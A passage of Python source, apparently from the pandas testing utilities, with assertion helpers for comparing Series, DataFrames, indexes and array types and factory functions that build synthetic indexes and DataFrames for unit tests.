left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(
lc, rc, obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that two 'np.ndarray' objects are equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both left and right are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(np.asarray(left.asi8), np.asarray(right.asi8))
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
if not is_numeric_dtype(left.dtype):
raise AssertionError("check_exact may only be used with numeric Series")
assert_numpy_array_equal(
left._values, right._values, check_dtype=check_dtype, obj=str(obj)
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(left._values, right._values)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(left._values, right._values)
else:
_testing.assert_almost_equal(
left._values,
right._values,
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
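# Minimal usage sketch, mirroring the assert_frame_equal example further below:
#   s1 = Series([1, 2, 3]); s2 = Series([1.0, 2.0, 3.0])
#   assert_series_equal(s1, s1)                     # passes
#   assert_series_equal(s1, s2, check_dtype=False)  # passes despite int64 vs float64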
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
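# Minimal sketch of the dispatch: the concrete assert_* function is chosen by type.
#   assert_equal(Index([1, 2]), Index([1, 2]))        # -> assert_index_equal
#   assert_equal(np.array([1, 2]), np.array([1, 2]))  # -> assert_numpy_array_equal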
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# indexes are equal; nothing further to check
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
Returns
-------
DataFrame with a "timestamp" DatetimeIndex and columns:
* name : object dtype with string names
* id : int dtype with Poisson-distributed integer ids
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/MultiIndex with given dimensions, levels, names, etc.

    nentries - number of entries in index
    nlevels - number of levels (> 1 produces a MultiIndex)
    prefix - a string prefix for labels
    names - (Optional), bool or list of strings. If True, default names are
        used; if False, no names are used; if a list is given, the name of
        each level in the index will be taken from the list.
    ndupe_l - (Optional), list of ints, the number of rows for which the
        label will be repeated at the corresponding level. You can specify
        just the first few; the rest will use the default ndupe_l of 1.
        len(ndupe_l) <= nlevels.
    idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
        If idx_type is not None, `nlevels` must be 1.
        "i"/"f" creates an integer/float index,
        "s"/"u" creates a string/unicode index,
        "dt" creates a datetime index,
        "p" creates a period index,
        "td" creates a timedelta index.
        If unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
    assert names is None or names is False or names is True or len(names) == nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
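# A minimal usage sketch (illustrative only; the helper name below is not part
# of the original module). It shows how the knobs documented in makeCustomIndex
# compose: a flat string index and a two-level MultiIndex whose first level
# repeats every label twice.
def _demo_makeCustomIndex():
    # single-level index with default "#"-prefixed string labels
    flat = makeCustomIndex(nentries=5, nlevels=1)
    assert len(flat) == 5
    # two-level MultiIndex; ndupe_l=[2] duplicates each first-level label twice
    multi = makeCustomIndex(nentries=6, nlevels=2, ndupe_l=[2], names=True)
    assert isinstance(multi, MultiIndex)
    assert list(multi.names) == ["#0", "#1"]
    return flat, multi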
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings; yields no names,
        default names, or uses the provided names for the levels of the
        corresponding index. You can provide a single string when
        c_idx_nlevels == 1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level MultiIndex on rows with names provided, 2-level MultiIndex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
